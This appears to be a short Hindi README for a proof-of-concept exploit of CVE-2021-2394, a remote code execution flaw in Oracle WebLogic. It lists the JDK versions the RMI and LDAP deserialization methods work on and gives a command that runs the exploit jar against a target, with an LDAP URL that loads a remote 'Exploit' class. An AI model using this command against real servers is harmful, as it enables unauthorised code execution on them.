
CVE-2021-2394 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Oracle WebLogic Server में एक रिमोट कोड एक्ज़ीक्यूशन भेद्यता है। पेलोड पहुंचाने के लिए LDAP या RMI डिसीरियलाइज़ेशन का उपयोग करता है।
CVE-2021-2394 का POC
ध्यान देने योग्य बातें
RMI-आधारित उपयोग विधि, JDK संस्करण 6u132, 7u131, 8u121 से पहले तक सीमित है; 8u122 और उसके बाद के संस्करणों में, डीसीरियलाइज़ेशन व्हाइटलिस्ट तंत्र जोड़ा गया, RMI दूरस्थ कोड लोडिंग बंद कर दी गई LDAP-आधारित उपयोग विधि, JDK संस्करण 6u211, 7u201, 8u191, 11.0.1 से पहले तक सीमित है; 8u191 संस्करण में, Oracle ने LDAP वेक्टर पर प्रतिबंध लगाए, CVE-2018-3149 जारी किया, JNDI दूरस्थ क्लास लोडिंग बंद कर दी स्रोत: https://www.freebuf.com/vuls/279465.html
उपयोग विधि:
java -jar CVE_2021_2394.jar rhost rport ldapurljava -jar CVE_2021_2394.jar 192.168.137.1 7001 ldap://192.168.137.1:8087/Exploitसंदर्भ लिंक:
अद्यतन
विश्लेषण लेख